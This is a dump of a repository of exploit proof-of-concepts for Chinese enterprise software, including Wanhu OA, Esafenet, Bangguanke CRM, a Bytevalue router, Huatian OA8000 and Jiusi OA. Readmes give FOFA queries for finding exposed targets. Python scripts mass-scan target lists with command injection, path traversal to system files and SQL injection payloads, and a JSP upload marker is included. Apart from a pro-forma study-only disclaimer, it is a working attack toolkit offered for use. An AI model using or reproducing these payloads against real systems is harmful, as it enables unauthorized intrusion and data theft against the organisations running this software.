-------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240202万户OA-senddocument_import.jsp任意文件上传漏洞-1/assets/image-20240121123620660.png -------------------------------------------------------------------------------- /20240202万户OA-senddocument_import.jsp任意文件上传漏洞-1/assets/image-20240202203022822.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240202万户OA-senddocument_import.jsp任意文件上传漏洞-1/assets/image-20240202203022822.png -------------------------------------------------------------------------------- /20240202万户OA-senddocument_import.jsp任意文件上传漏洞-1/readme.md: -------------------------------------------------------------------------------- 1 | # 万户OA-senddocument_import.jsp任意文件上传漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | fofa 6 | 7 | ``` 8 | app="万户网络-ezOFFICE"&&body="/defaultroot/" 9 | ``` 10 | 11 | 批量poc(记得安装库) 12 | 13 | python poc.py -u 14 | 15 | python poc.py -f .txt 16 | 17 | 结果保存至result.txt 18 | 19 | ![image-20240202203022822](assets/image-20240202203022822.png) 20 | 21 | ## 入圈(限时体验) 22 | 23 | 24 | 25 | ![image-20240121123620660](assets/image-20240121123620660.png)s 26 | 27 | -------------------------------------------------------------------------------- /20240202万户OA-senddocument_import.jsp任意文件上传漏洞-1/y1.jsp: -------------------------------------------------------------------------------- 1 | <%out.println("y1k1ng");new java.io.File(application.getRealPath(request.getServletPath())).delete();%> -------------------------------------------------------------------------------- /20240203亿赛通电子文档安全管理系统 uploadfiletocatalog sql注入/assets/image-20240121123620660.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240203亿赛通电子文档安全管理系统 uploadfiletocatalog sql注入/assets/image-20240121123620660.png -------------------------------------------------------------------------------- /20240203亿赛通电子文档安全管理系统 uploadfiletocatalog sql注入/assets/image-20240202203022822.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240203亿赛通电子文档安全管理系统 uploadfiletocatalog sql注入/assets/image-20240202203022822.png -------------------------------------------------------------------------------- /20240203亿赛通电子文档安全管理系统 uploadfiletocatalog sql注入/readme.md: -------------------------------------------------------------------------------- 1 | # 亿赛通电子文档安全管理系统 uploadfiletocatalog sql注入 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | fofa 6 | 7 | ``` 8 | app="亿赛通-电子文档安全管理系统" 9 | ``` 10 | 11 | 批量poc(记得安装库) 12 | 13 | python poc.py -u 14 | 15 | python poc.py -f .txt 16 | 17 | 结果保存至result.txt 18 | 19 | ![image-20240202203022822](assets/image-20240202203022822.png) 20 | 21 | ## 入圈(限时体验) 22 | 23 | 24 | 25 | ![image-20240121123620660](assets/image-20240121123620660.png)s 26 | 27 | -------------------------------------------------------------------------------- /20240205帮管客CRM 文件上传/assets/image-20240121123620660.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240205帮管客CRM 文件上传/assets/image-20240121123620660.png -------------------------------------------------------------------------------- /20240205帮管客CRM 文件上传/assets/image-20240202203022822.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240205帮管客CRM 文件上传/assets/image-20240202203022822.png -------------------------------------------------------------------------------- /20240205帮管客CRM 文件上传/readme.md: -------------------------------------------------------------------------------- 1 | # 帮管客CRM 文件上传 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | fofa 6 | 7 | ``` 8 | FOFA:app="帮管客-CRM" 9 | ``` 10 | 11 | 批量poc(记得安装库) 12 | 13 | python poc.py -u 14 | 15 | python poc.py -f .txt 16 | 17 | 结果保存至result.txt 18 | 19 | ![image-20240202203022822](assets/image-20240202203022822.png) 20 | 21 | ## 入圈(限时体验) 22 | 23 | 24 | 25 | ![image-20240121123620660](assets/image-20240121123620660.png)s 26 | 27 | -------------------------------------------------------------------------------- /20240205帮管客CRM 文件上传/y1.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /20240206百为智能流控路由器RCE/assets/Snipaste_2024-02-07_19-04-37.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240206百为智能流控路由器RCE/assets/Snipaste_2024-02-07_19-04-37.png -------------------------------------------------------------------------------- /20240206百为智能流控路由器RCE/assets/image-20240121123620660.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240206百为智能流控路由器RCE/assets/image-20240121123620660.png -------------------------------------------------------------------------------- /20240206百为智能流控路由器RCE/assets/image-20240202203022822.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240206百为智能流控路由器RCE/assets/image-20240202203022822.png -------------------------------------------------------------------------------- /20240206百为智能流控路由器RCE/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import argparse 3 | import base64 4 | import re 5 | import sys 6 | import json 7 | from multiprocessing.dummy import Pool 8 | import requests 9 | import urllib3 10 | from rich.console import Console 11 | 12 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 13 | 14 | 15 | def banner(): 16 | test = """ 17 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 18 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 19 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 20 | "8aa8" 88 88,d88' 88 88 `8b 88 88 21 | `88' 88 8888"88, 88 88 `8b 88 88 88888 22 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 23 | 88 88 88 "88, 88 88 `888 `"Y88888P" 24 | 25 | 888888888888 26 | 27 | tag: this is a 百为智能流控路由器RCE poc 28 | @version: 1.0.0 @author: Y1_K1NG 29 | """ 30 | print(test) 31 | 32 | 33 | def poc(target): 34 | if target[-1] == '/': 35 | target = target[:-1] 36 | else: 37 | target = target 38 | path = "/goform/webRead/open/?path=|whoami" 39 | url = target + path 40 | headers = { 41 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0', 42 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8', 43 | 'Accept-Encoding': 'gzip, deflate', 44 | 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2', 45 | 'Connection': 'close', 46 | 'Upgrade-Insecure-Requests': '127' 47 | } 48 | 49 | 50 | 51 | try: 52 | # conn = http.client.HTTPConnection(target) 53 | # conn.request("POST", path, body.encode("utf-8"), headers) 54 | # response1 = conn.getresponse() 55 | response1 = requests.get(url, headers=headers, verify=False, timeout=15) 56 | # print(response1.status_code) 57 | if response1.status_code == 200 and 'admin' in response1.text: 58 | 59 | print(f"[++++++] {target} 存在 百为智能流控路由器RCE") 60 | with open("result.txt", "a+", encoding="utf-8") as f: 61 | f.write(target + "\n") 62 | 63 | else: 64 | print(f"[-] {target} 未发现") 65 | 66 | except Exception as e: 67 | print(f"[*] {target} error: {str(e)}") 68 | 69 | 70 | def extract_host(url): 71 | """ 72 | 从 URL 中提取主机地址和端口号,返回 (host, port) 73 | """ 74 | match = re.search(r"(http://|https://)?([\w\.]+):?(\d+)?", url) 75 | if match: 76 | prefix, host, port = match.groups() 77 | if not port: 78 | if prefix and "https" in prefix: 79 | port = "443" 80 | else: 81 | port = "80" 82 | return host, int(port) 83 | else: 84 | return None, None 85 | 86 | 87 | def main(): 88 | banner() 89 | parser = argparse.ArgumentParser(description='任何问题+V y1k1ng1227') 90 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 91 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 92 | args = parser.parse_args() 93 | 94 | if args.url and not args.file: 95 | if "https://" in args.url or "http://" in args.url: 96 | url = args.url 97 | else: 98 | host, port = extract_host(args.url) 99 | url = f"http://{host}:{port}" 100 | poc(url) 101 | 102 | elif args.url is None and args.file is not None: 103 | url_list = [] 104 | with open(args.file, "r", encoding="utf-8") as f: 105 | for url in f.readlines(): 106 | url = url.strip().replace("\n", "") 107 | if "https://" in url or "http://" in url: 108 | url = url 109 | else: 110 | host, port = extract_host(url) 111 | url = f"http://{host}:{port}" 112 | url_list.append(url) 113 | 114 | pool = Pool(10) 115 | pool.map(poc, url_list) 116 | pool.close() 117 | pool.join() 118 | 119 | else: 120 | parser.print_help() 121 | 122 | 123 | if __name__ == '__main__': 124 | main() 125 | -------------------------------------------------------------------------------- /20240206百为智能流控路由器RCE/readme.md: -------------------------------------------------------------------------------- 1 | # 百为智能流控路由器RCE 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | fofa 6 | 7 | ``` 8 | title="BYTEVALUE 智能流控路由器" 9 | ``` 10 | 11 | 批量poc(记得安装库) 12 | 13 | python poc.py -u 14 | 15 | python poc.py -f .txt 16 | 17 | 结果保存至result.txt 18 | 19 | ![Snipaste_2024-02-07_19-04-37](assets/Snipaste_2024-02-07_19-04-37.png) 20 | 21 | ![image-20240202203022822](assets/image-20240202203022822.png) 22 | 23 | ## 入圈(限时体验) 24 | 25 | 26 | 27 | ![image-20240121123620660](assets/image-20240121123620660.png)s 28 | 29 | -------------------------------------------------------------------------------- /20240218WordPress Plugin HTML5 Video Player SQL注入漏洞/assets/image-20240628210919948.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240218WordPress Plugin HTML5 Video Player SQL注入漏洞/assets/image-20240628210919948.png -------------------------------------------------------------------------------- /20240218WordPress Plugin HTML5 Video Player SQL注入漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # WordPress Plugin HTML5 Video Player SQL注入漏洞(CVE-2024-1061) 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | 6 | 7 | 批量poc(记得安装库) 8 | 9 | python poc.py -u 10 | 11 | python poc.py -f .txt 12 | 13 | 结果保存至result.txt![image-20240628210919948](assets/image-20240628210919948.png) 14 | 15 | ![](assets/Snipaste_2024-02-07_19-04-37.png) 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /20240219用友政务A++V832产品未授权访问漏洞/assets/image-20240121123620660.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240219用友政务A++V832产品未授权访问漏洞/assets/image-20240121123620660.png -------------------------------------------------------------------------------- /20240219用友政务A++V832产品未授权访问漏洞/assets/image-20240202203022822.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240219用友政务A++V832产品未授权访问漏洞/assets/image-20240202203022822.png -------------------------------------------------------------------------------- /20240219用友政务A++V832产品未授权访问漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # 用友政务A++V832产品未授权访问漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | 6 | 7 | 批量poc(记得安装库) 8 | 9 | python poc.py -u 10 | 11 | python poc.py -f .txt 12 | 13 | 结果保存至result.txt 14 | 15 | ![](assets/Snipaste_2024-02-07_19-04-37.png) 16 | 17 | ![image-20240202203022822](assets/image-20240202203022822.png) 18 | 19 | ## 入圈(限时体验) 20 | 21 | 22 | 23 | ![image-20240121123620660](assets/image-20240121123620660.png)s 24 | 25 | -------------------------------------------------------------------------------- /20240221亿赛通 电子文档安全管理系统 ClientAjax 任意文件下载/assets/image-20240121123620660.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240221亿赛通 电子文档安全管理系统 ClientAjax 任意文件下载/assets/image-20240121123620660.png -------------------------------------------------------------------------------- /20240221亿赛通 电子文档安全管理系统 ClientAjax 任意文件下载/assets/image-20240202203022822.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240221亿赛通 电子文档安全管理系统 ClientAjax 任意文件下载/assets/image-20240202203022822.png -------------------------------------------------------------------------------- /20240221亿赛通 电子文档安全管理系统 ClientAjax 任意文件下载/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import argparse 3 | import base64 4 | import re 5 | import sys 6 | import json 7 | from multiprocessing.dummy import Pool 8 | import requests 9 | import urllib3 10 | from rich.console import Console 11 | 12 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 13 | 14 | 15 | def banner(): 16 | test = """ 17 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 18 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 19 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 20 | "8aa8" 88 88,d88' 88 88 `8b 88 88 21 | `88' 88 8888"88, 88 88 `8b 88 88 88888 22 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 23 | 88 88 88 "88, 88 88 `888 `"Y88888P" 24 | 25 | 888888888888 26 | 27 | tag: this is a 亿赛通 电子文档安全管理系统 ClientAjax 任意文件下载 28 | @version: 1.0.0 @author: Y1_K1NG 29 | """ 30 | print(test) 31 | 32 | 33 | def poc(target): 34 | if target[-1] == '/': 35 | target = target[:-1] 36 | else: 37 | target = target 38 | path = "/CDGServer3/ClientAjax" 39 | url = target + path 40 | headers = { 41 | "User-Agent": "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", 42 | "Content-Type": "application/x-www-form-urlencoded", 43 | "Accept-Encoding": "gzip, deflate, br" 44 | } 45 | 46 | data = { 47 | "command": "downclientpak", 48 | "InstallationPack": "../../../../../../../../../../windows/win.ini", 49 | "forward": "index.jsp" 50 | } 51 | 52 | try: 53 | # conn = http.client.HTTPConnection(target) 54 | # conn.request("POST", path, body.encode("utf-8"), headers) 55 | # response1 = conn.getresponse() 56 | response1 = requests.get(url, headers=headers, verify=False, timeout=15) 57 | # print(response1.status_code) 58 | 59 | 60 | if response1.status_code == 200 and "; for 16-bit app support" in response1.text: 61 | 62 | print(f"[++++++] {target} 存在 ClientAjax 任意文件下载") 63 | with open("result.txt", "a+", encoding="utf-8") as f: 64 | f.write(target + "\n") 65 | 66 | else: 67 | print(f"[-] {target} 未发现") 68 | 69 | except Exception as e: 70 | print(f"[*] {target} error: {str(e)}") 71 | 72 | 73 | def extract_host(url): 74 | """ 75 | 从 URL 中提取主机地址和端口号,返回 (host, port) 76 | """ 77 | match = re.search(r"(http://|https://)?([\w\.]+):?(\d+)?", url) 78 | if match: 79 | prefix, host, port = match.groups() 80 | if not port: 81 | if prefix and "https" in prefix: 82 | port = "443" 83 | else: 84 | port = "80" 85 | return host, int(port) 86 | else: 87 | return None, None 88 | 89 | 90 | def main(): 91 | banner() 92 | parser = argparse.ArgumentParser(description='任何问题+V y1k1ng1227') 93 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 94 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 95 | args = parser.parse_args() 96 | 97 | if args.url and not args.file: 98 | if "https://" in args.url or "http://" in args.url: 99 | url = args.url 100 | else: 101 | host, port = extract_host(args.url) 102 | url = f"http://{host}:{port}" 103 | poc(url) 104 | 105 | elif args.url is None and args.file is not None: 106 | url_list = [] 107 | with open(args.file, "r", encoding="utf-8") as f: 108 | for url in f.readlines(): 109 | url = url.strip().replace("\n", "") 110 | if "https://" in url or "http://" in url: 111 | url = url 112 | else: 113 | host, port = extract_host(url) 114 | url = f"http://{host}:{port}" 115 | url_list.append(url) 116 | 117 | pool = Pool(10) 118 | pool.map(poc, url_list) 119 | pool.close() 120 | pool.join() 121 | 122 | else: 123 | parser.print_help() 124 | 125 | 126 | if __name__ == '__main__': 127 | main() 128 | -------------------------------------------------------------------------------- /20240221亿赛通 电子文档安全管理系统 ClientAjax 任意文件下载/readme.md: -------------------------------------------------------------------------------- 1 | # 亿赛通 电子文档安全管理系统 ClientAjax 任意文件下载 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | fofa:title="电子文档安全管理系统" 6 | 7 | 批量poc(记得安装库) 8 | 9 | python poc.py -u 10 | 11 | python poc.py -f .txt 12 | 13 | 结果保存至result.txt 14 | 15 | ![](assets/Snipaste_2024-02-07_19-04-37.png) 16 | 17 | ![image-20240202203022822](assets/image-20240202203022822.png) 18 | 19 | ## 入圈(限时体验) 20 | 21 | 22 | 23 | ![image-20240121123620660](assets/image-20240121123620660.png)s 24 | 25 | -------------------------------------------------------------------------------- /20240224用友U8-OA协同工作系统doUpload.jsp接口存在任意文件上传/assets/image-20240121123620660.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240224用友U8-OA协同工作系统doUpload.jsp接口存在任意文件上传/assets/image-20240121123620660.png -------------------------------------------------------------------------------- /20240224用友U8-OA协同工作系统doUpload.jsp接口存在任意文件上传/assets/image-20240202203022822.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240224用友U8-OA协同工作系统doUpload.jsp接口存在任意文件上传/assets/image-20240202203022822.png -------------------------------------------------------------------------------- /20240224用友U8-OA协同工作系统doUpload.jsp接口存在任意文件上传/readme.md: -------------------------------------------------------------------------------- 1 | # 用友U8-OA协同工作系统doUpload.jsp接口存在任意文件上传 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | title="用友U8-OA" 6 | 7 | 批量poc(记得安装库) 8 | 9 | python poc.py -u 10 | 11 | python poc.py -f .txt 12 | 13 | 结果保存至result.txt 14 | 15 | ![](assets/Snipaste_2024-02-07_19-04-37.png) 16 | 17 | ![image-20240202203022822](assets/image-20240202203022822.png) 18 | 19 | ## 入圈(限时体验) 20 | 21 | 22 | 23 | ![image-20240121123620660](assets/image-20240121123620660.png)s 24 | 25 | -------------------------------------------------------------------------------- /20240303华天动力OA8000办公系统ntkodownload.jsp存在任意文件读取漏洞/assets/image-20240121123620660.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240303华天动力OA8000办公系统ntkodownload.jsp存在任意文件读取漏洞/assets/image-20240121123620660.png -------------------------------------------------------------------------------- /20240303华天动力OA8000办公系统ntkodownload.jsp存在任意文件读取漏洞/assets/image-20240202203022822.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240303华天动力OA8000办公系统ntkodownload.jsp存在任意文件读取漏洞/assets/image-20240202203022822.png -------------------------------------------------------------------------------- /20240303华天动力OA8000办公系统ntkodownload.jsp存在任意文件读取漏洞/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import argparse 3 | import base64 4 | import re 5 | import sys 6 | import json 7 | from multiprocessing.dummy import Pool 8 | import requests 9 | import urllib3 10 | from rich.console import Console 11 | 12 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 13 | 14 | 15 | def banner(): 16 | test = """ 17 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 18 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 19 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 20 | "8aa8" 88 88,d88' 88 88 `8b 88 88 21 | `88' 88 8888"88, 88 88 `8b 88 88 88888 22 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 23 | 88 88 88 "88, 88 88 `888 `"Y88888P" 24 | 25 | 888888888888 26 | 27 | tag: this is a 华天动力OA8000办公系统ntkodownload.jsp存在任意文件读取漏洞 28 | @version: 1.0.0 @author: Y1_K1NG 29 | """ 30 | print(test) 31 | 32 | 33 | def poc(target): 34 | if target[-1] == '/': 35 | target = target[:-1] 36 | else: 37 | target = target 38 | path = "/OAapp/jsp/trace/ntkodownload.jsp?filename=../../../../../../../htoa/Tomcat/webapps/ROOT/WEB-INF/web.xml" 39 | url = target + path 40 | headers = { 41 | "User-Agent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", 42 | "Accept": "*/*", 43 | "Connection": "Keep-Alive" 44 | } 45 | 46 | 47 | 48 | try: 49 | # conn = http.client.HTTPConnection(target) 50 | # conn.request("POST", path, body.encode("utf-8"), headers) 51 | # response1 = conn.getresponse() 52 | response1 = requests.get(url=url, headers=headers, verify=False, timeout=15) 53 | print(response1.headers) 54 | 55 | if response1.status_code == 200 and "web.xml" in response1.headers.get("Content-Disposition", ""): 56 | print(f"[++++++] {target} 存在 任意文件读取") 57 | with open("result.txt", "a+", encoding="utf-8") as f: 58 | f.write(target + "\n") 59 | else: 60 | print(f"[-] {target} 未发现") 61 | 62 | except Exception as e: 63 | print(f"[*] {target} error: {str(e)}") 64 | 65 | 66 | def extract_host(url): 67 | """ 68 | 从 URL 中提取主机地址和端口号,返回 (host, port) 69 | """ 70 | match = re.search(r"(http://|https://)?([\w\.]+):?(\d+)?", url) 71 | if match: 72 | prefix, host, port = match.groups() 73 | if not port: 74 | if prefix and "https" in prefix: 75 | port = "443" 76 | else: 77 | port = "80" 78 | return host, int(port) 79 | else: 80 | return None, None 81 | 82 | 83 | def main(): 84 | banner() 85 | parser = argparse.ArgumentParser(description='任何问题+V y1k1ng1227') 86 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 87 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 88 | args = parser.parse_args() 89 | 90 | if args.url and not args.file: 91 | if "https://" in args.url or "http://" in args.url: 92 | url = args.url 93 | else: 94 | host, port = extract_host(args.url) 95 | url = f"http://{host}:{port}" 96 | poc(url) 97 | 98 | elif args.url is None and args.file is not None: 99 | url_list = [] 100 | with open(args.file, "r", encoding="utf-8") as f: 101 | for url in f.readlines(): 102 | url = url.strip().replace("\n", "") 103 | if "https://" in url or "http://" in url: 104 | url = url 105 | else: 106 | host, port = extract_host(url) 107 | url = f"http://{host}:{port}" 108 | url_list.append(url) 109 | 110 | pool = Pool(10) 111 | pool.map(poc, url_list) 112 | pool.close() 113 | pool.join() 114 | 115 | else: 116 | parser.print_help() 117 | 118 | 119 | if __name__ == '__main__': 120 | main() 121 | -------------------------------------------------------------------------------- /20240303华天动力OA8000办公系统ntkodownload.jsp存在任意文件读取漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # 华天动力OA8000办公系统ntkodownload.jsp存在任意文件读取漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | app="华天动力-OA8000" 6 | 7 | 批量poc(记得安装库) 8 | 9 | pip install argparse requests rich 10 | 11 | python poc.py -u 12 | 13 | python poc.py -f .txt 14 | 15 | 结果保存至result.txt 16 | 17 | ![](assets/Snipaste_2024-02-07_19-04-37.png) 18 | 19 | ![image-20240202203022822](assets/image-20240202203022822.png) 20 | 21 | ## 入圈(限时体验) 22 | 23 | 24 | 25 | ![image-20240121123620660](assets/image-20240121123620660.png)s 26 | 27 | -------------------------------------------------------------------------------- /20240304九思OA软件user_list_3g.jsp存在SQL注入漏洞/assets/image-20240121123620660.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240304九思OA软件user_list_3g.jsp存在SQL注入漏洞/assets/image-20240121123620660.png -------------------------------------------------------------------------------- /20240304九思OA软件user_list_3g.jsp存在SQL注入漏洞/assets/image-20240202203022822.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240304九思OA软件user_list_3g.jsp存在SQL注入漏洞/assets/image-20240202203022822.png -------------------------------------------------------------------------------- /20240304九思OA软件user_list_3g.jsp存在SQL注入漏洞/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import argparse 3 | import base64 4 | import re 5 | import sys 6 | import json 7 | from multiprocessing.dummy import Pool 8 | import requests 9 | import urllib3 10 | import hashlib 11 | from rich.console import Console 12 | 13 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 14 | 15 | 16 | def banner(): 17 | test = """ 18 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 19 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 20 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 21 | "8aa8" 88 88,d88' 88 88 `8b 88 88 22 | `88' 88 8888"88, 88 88 `8b 88 88 88888 23 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 24 | 88 88 88 "88, 88 88 `888 `"Y88888P" 25 | 26 | 888888888888 27 | 28 | tag: this is a 九思OA软件user_list_3g.jsp存在SQL注入漏洞 29 | @version: 1.0.0 @author: Y1_K1NG 30 | """ 31 | print(test) 32 | 33 | 34 | def poc(target): 35 | if target[-1] == '/': 36 | target = target[:-1] 37 | else: 38 | target = target 39 | path = "/jsoa/wap2/personalMessage/user_list_3g.jsp?userIds=1&userNames=1&content=1&org_id=1%20union/**/select/**/1,md5(1)%20%23" 40 | url = target + path 41 | headers = { 42 | 'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1', 43 | 'Accept': '*/*', 44 | 'Connection': 'Keep-Alive' 45 | } 46 | md5_value = hashlib.md5("1".encode()).hexdigest() 47 | 48 | try: 49 | # conn = http.client.HTTPConnection(target) 50 | # conn.request("POST", path, body.encode("utf-8"), headers) 51 | # response1 = conn.getresponse() 52 | response1 = requests.get(url=url, headers=headers, verify=False, timeout=15) 53 | # print(response1.headers) 54 | 55 | if response1.status_code == 200 and md5_value in response1.text: 56 | print(f"[++++++] {target} 存在 sql注入") 57 | with open("result.txt", "a+", encoding="utf-8") as f: 58 | f.write(target + "\n") 59 | else: 60 | print(f"[-] {target} 未发现") 61 | 62 | except Exception as e: 63 | print(f"[*] {target} error: {str(e)}") 64 | 65 | 66 | def extract_host(url): 67 | """ 68 | 从 URL 中提取主机地址和端口号,返回 (host, port) 69 | """ 70 | match = re.search(r"(http://|https://)?([\w\.]+):?(\d+)?", url) 71 | if match: 72 | prefix, host, port = match.groups() 73 | if not port: 74 | if prefix and "https" in prefix: 75 | port = "443" 76 | else: 77 | port = "80" 78 | return host, int(port) 79 | else: 80 | return None, None 81 | 82 | 83 | def main(): 84 | banner() 85 | parser = argparse.ArgumentParser(description='任何问题+V y1k1ng1227') 86 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 87 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 88 | args = parser.parse_args() 89 | 90 | if args.url and not args.file: 91 | if "https://" in args.url or "http://" in args.url: 92 | url = args.url 93 | else: 94 | host, port = extract_host(args.url) 95 | url = f"http://{host}:{port}" 96 | poc(url) 97 | 98 | elif args.url is None and args.file is not None: 99 | url_list = [] 100 | with open(args.file, "r", encoding="utf-8") as f: 101 | for url in f.readlines(): 102 | url = url.strip().replace("\n", "") 103 | if "https://" in url or "http://" in url: 104 | url = url 105 | else: 106 | host, port = extract_host(url) 107 | url = f"http://{host}:{port}" 108 | url_list.append(url) 109 | 110 | pool = Pool(10) 111 | pool.map(poc, url_list) 112 | pool.close() 113 | pool.join() 114 | 115 | else: 116 | parser.print_help() 117 | 118 | 119 | if __name__ == '__main__': 120 | main() 121 | -------------------------------------------------------------------------------- /20240304九思OA软件user_list_3g.jsp存在SQL注入漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # 九思OA软件user_list_3g.jsp存在SQL注入漏洞 2 | 3 | 